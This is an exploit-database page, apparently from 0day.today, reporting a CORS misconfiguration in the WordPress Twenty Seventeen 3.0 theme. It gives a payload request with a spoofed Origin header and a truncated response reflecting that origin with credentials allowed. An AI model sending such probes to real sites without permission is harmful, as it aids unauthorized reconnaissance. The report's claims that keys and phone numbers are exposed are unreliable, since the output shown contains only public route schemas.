0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Twenty Seventeen 3.0 Cross-origin resource sharing information Vulnerability
[## Title: WordPress 6.0.2 - THEME - Twenty Seventeen: 3.0- CORS-Vulnerability
## Author: nu11secur1ty
## Vendor: https://wordpress.org/
## Software: Twenty SeventeenVersion: 3.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Twenty-Seventeen-3.0
## Description:
The theme Twenty Seventeen-3.0 is vulnerable to CORS - Cross-origin resource sharing information.
The attacker can get very sensitive information from the system a.k.a username, key authentication, phone numbers some library information and etc.
By using this information the attacker can organize other more dangerous attacks against the system and he can apply serious damage.
STATUS: Medium - HIGH
[+] Payload REQUEST:
```
GET /wordpress/wp-json/ HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="105", "Chromium";v="105"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Origin: http://pwnedhost1.com/
```
[+]Payload RESPONSE:
```
HTTP/1.1 200 OK
Date: Wed, 07 Sep 2022 11:08:52 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Robots-Tag: noindex
Link: <http://pwnedhost.com/wordpress/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Allow: GET
Access-Control-Allow-Origin: http://pwnedhost1.com/
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 161249
{"name":"nu11secur1ty","description":"Just another WordPress site","url":"http:\/\/pwnedhost.com\/wordpress","home":"http:\/\/pwnedhost.com\/wordpress","gmt_offset":"0","timezone_string":"","namespaces":["oembed\/1.0","wp\/v2","wp-site-health\/v1","wp-block-editor\/v1"],"authentication":[],"routes":{"\/":{"namespace":"","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"context":{"default":"view","required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/"}]}},"\/batch\/v1":{"namespace":"","methods":["POST"],"endpoints":[{"methods":["POST"],"args":{"validation":{"type":"string","enum":["require-all-validate","normal"],"default":"normal","required":false},"requests":{"type":"array","maxItems":25,"items":{"type":"object","properties":{"method":{"type":"string","enum":["POST","PUT","PATCH","DELETE"],"default":"POST"},"path":{"type":"string","required":true},"body":{"type":"object","properties":[],"additionalProperties":true},"headers":{"type":"object","properties":[],"additionalProperties":{"type":["string","array"],"items":{"type":"string"}}}}},"required":true}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/batch\/v1"}]}},"\/oembed\/1.0":{"namespace":"oembed\/1.0","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"namespace":{"default":"oembed\/1.0","required":false},"context":{"default":"view","required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/oembed\/1.0"}]}},"\/oembed\/1.0\/embed":{"namespace":"oembed\/1.0","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"url":{"description":"The URL of the resource for which to fetch oEmbed data.","type":"string","format":"uri","required":true},"format":{"default":"json","required":false},"maxwidth":{"default":600,"required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/oembed\/1.0\/embed"}]}},"\/oembed\/1.0\/proxy":{"namespace":"oembed\/1.0","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"url":{"description":"The URL of the resource for which to fetch oEmbed data.","type":"string","format":"uri","required":true},"format":{"description":"The oEmbed format to use.","type":"string","default":"json","enum":["json","xml"],"required":false},"maxwidth":{"description":"The maximum width of the embed frame in pixels.","type":"integer","default":600,"required":false},"maxheight":{"description":"The maximum height of the embed frame in pixels.","type":"integer","required":false},"discover":{"description":"Whether to perform an oEmbed discovery request for unsanctioned providers.","type":"boolean","default":true,"required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/oembed\/1.0\/proxy"}]}},"\/wp\/v2":{"namespace":"wp\/v2","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"namespace":{"default":"wp\/v2","required":false},"context":{"default":"view","required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/wp\/v2"}]}},"\/wp\/v2\/posts":{"namespace":"wp\/v2","methods":["GET","POST"],"endpoints":[{"methods":["GET"],"allow_batch":{"v1":true},"args":{"context":{"description":"Scope under which the request is made; determines fields present in response.","type":"string","enum":["view","embed","edit"],"default":"view","required":false},"page":{"description":"Current page of the collection.","type":"integer","default":1,"minimum":1,"required":false},"per_page":{"description":"Maximum number of items to be returned in result set.","type":"integer","default":10,"minimum":1,"maximum":100,"required":false},"search":{"description":"Limit results to those matching a string.","type":"string","required":false},"after":{"description":"Limit response to posts published after a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"modified_after":{"description":"Limit response to posts modified after a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"author":{"description":"Limit result set to posts assigned to specific authors.","type":"array","items":{"type":"integer"},"default":[],"required":false},"author_exclude":{"description":"Ensure result set excludes posts assigned to specific authors.","type":"array","items":{"type":"integer"},"default":[],"required":false},"before":{"description":"Limit response to posts published before a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"modified_before":{"description":"Limit response to posts modified before a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"exclude":{"description":"Ensure result set excludes specific IDs.","type":"array","items":{"type":"integer"},"default":[],"required":false},"include":{"description":"Limit result set to specific IDs.","type":"array","items":{"type":"integer"},"default":[],"required":false},"offset":{"description":"Offset the result set by a specific number of items.","type":"integer","required":false},"order":{"description":"Order sort attribute ascending or descending.","type":"string","default":"desc","enum":["asc","desc"],"required":false},"orderby":{"description":"Sort collection by post attribute.","type":"string","default":"date","enum":["author","date","id","include","modified","parent","relevance","slug","include_slugs","title"],"required":false},"slug":{"description":"Limit result set to posts with one or more specific slugs.","type":"array","items":{"type":"string"},"required":false},"status":{"default":"publish","description":"Limit result set to posts assigned one or more statuses.","type":"array","items":{"enum":["publish","future","draft","pending","private","trash","auto-draft","inherit","request-pending","request-confirmed","request-failed","request-completed","any"],"type":"string"},"required":false},"tax_relation":{"description":"Limit result set based on relationship between multiple taxonomies.","type":"string","enum":["AND","OR"],"required":false},"categories":{"description":"Limit result set to items with specific terms
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Twenty-Seventeen-3.0)
## Proof and Exploit:
[href](https://streamable.com/5bohx4)
# 0day.today [2024-11-15] #